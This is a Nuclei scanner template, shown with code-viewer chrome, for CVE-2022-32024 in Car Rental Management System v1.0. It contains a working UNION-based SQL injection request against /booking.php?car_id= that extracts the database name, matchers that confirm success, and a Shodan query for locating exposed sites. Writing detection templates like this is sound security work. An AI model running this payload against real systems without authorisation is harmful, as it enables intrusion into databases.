33 lines
821 B
YAML
33 lines
821 B
YAML
|
id: CVE-2022-32024
|
||
|
|
||
|
info:
|
||
|
name: Car Rental Management System v1.0 - SQL Injection
|
||
|
author: arafatansari
|
||
|
severity: high
|
||
|
description: |
|
||
|
Car Rental Management System v1.0 is vulnerable to SQL Injection via /booking.php?car_id=.
|
||
|
reference:
|
||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32024
|
||
|
metadata:
|
||
|
shodan-query: http.html:"Car Rental Management System"
|
||
|
verified: "true"
|
||
|
tags: sql,cve,cms,2022
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /booking.php?car_id=-1%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- 'car_rental_db'
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|